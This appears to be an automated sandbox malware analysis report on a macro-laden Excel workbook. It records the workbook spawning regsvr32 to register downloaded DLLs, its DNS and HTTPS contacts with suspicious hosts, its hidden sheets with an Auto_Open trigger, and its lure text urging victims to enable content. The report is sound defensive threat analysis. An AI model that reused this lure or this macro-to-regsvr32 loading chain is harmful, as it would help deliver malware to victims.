Loading ...

Play interactive tourEdit tour

Windows Analysis Report idea-22543577.xlsm

Overview

General Information

Sample Name:idea-22543577.xlsm
Analysis ID:438634
MD5:690a255b0f1b59b3421800bab8b41c10
SHA1:1036eaadc0201b50d3d005ad05e208888021b945
SHA256:2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6740 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 6916 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 960 cmdline: regsvr32 ..\wail1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6340 cmdline: regsvr32 ..\wail2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\wail1.dll, CommandLine: regsvr32 ..\wail1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6740, ProcessCommandLine: regsvr32 ..\wail1.dll, ProcessId: 960

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.4:49740 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficDNS query: name: senderoalcielo.com
Source: global trafficTCP traffic: 192.168.2.4:49738 -> 108.167.165.249:443
Source: global trafficTCP traffic: 192.168.2.4:49738 -> 108.167.165.249:443
Source: Joe Sandbox ViewIP Address: 5.100.155.169 5.100.155.169
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: senderoalcielo.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.aadrm.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.office.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.onedrive.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://augloop.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://augloop.office.com/v2
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cdn.entity.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://clients.config.office.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://config.edge.skype.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cortana.ai/api
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://cr.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dev.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://devnull.onenote.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://directory.services.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://graph.windows.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://graph.windows.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://lifecycle.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://login.windows.local
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://management.azure.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://management.azure.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://messaging.office.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ncus.contentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://officeapps.live.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://onedrive.live.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://outlook.office.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://outlook.office365.com/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://powerlift.acompli.net
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://settings.outlook.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://staging.cortana.ai
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://tasks.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://webshell.suite.office.com
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://wus2.contentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: FF586352-751C-4478-9E87-FF9CF397D4DE.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 108.167.165.249:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. W&~- - 15 / : 16 Pro
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 19 the decryption of the docum
Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock ti Make sure the bjnaryjs stored atthe specified path ordebug C it to ch
Source: Screenshot number: 8Screenshot OCR: Enable content" to perform 19 the decryption of the document. LSISJ 20 ' :: 0 SecurityWarning M
Source: Screenshot number: 12Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Screenshot number: 12Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 0Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 0Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 0 Protected View This
Source: Document image extraction number: 1Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: idea-22543577.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: 1" sheetId="16" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="17" r:id="rId2"/><sheet name="Sheet1" sheetId="4" r:id="rId3"/><sheet name="Sheet2" sheetId="12" r:id="rId4"/><sheet name="Sheet4" sheetId="10" state="hidden" r:id="rId5"/><sheet name="Sheet5" sheetId="11" state="hidden" r:id="rId6"/><sheet name="Sheet6" sheetId="15" state="hidden" r:id="rId7"/><sheet name="Sheet7" sheetId="14" state="hidden" r:id="rId8"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet6!$AJ$9</definedName></definedNames><calcPr calcId="122211"/></workbook>
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/9@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D4B42EE3-70BD-46E4-8A3E-29B11A1F2BF3} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail2.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail2.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: idea-22543577.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\wail1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
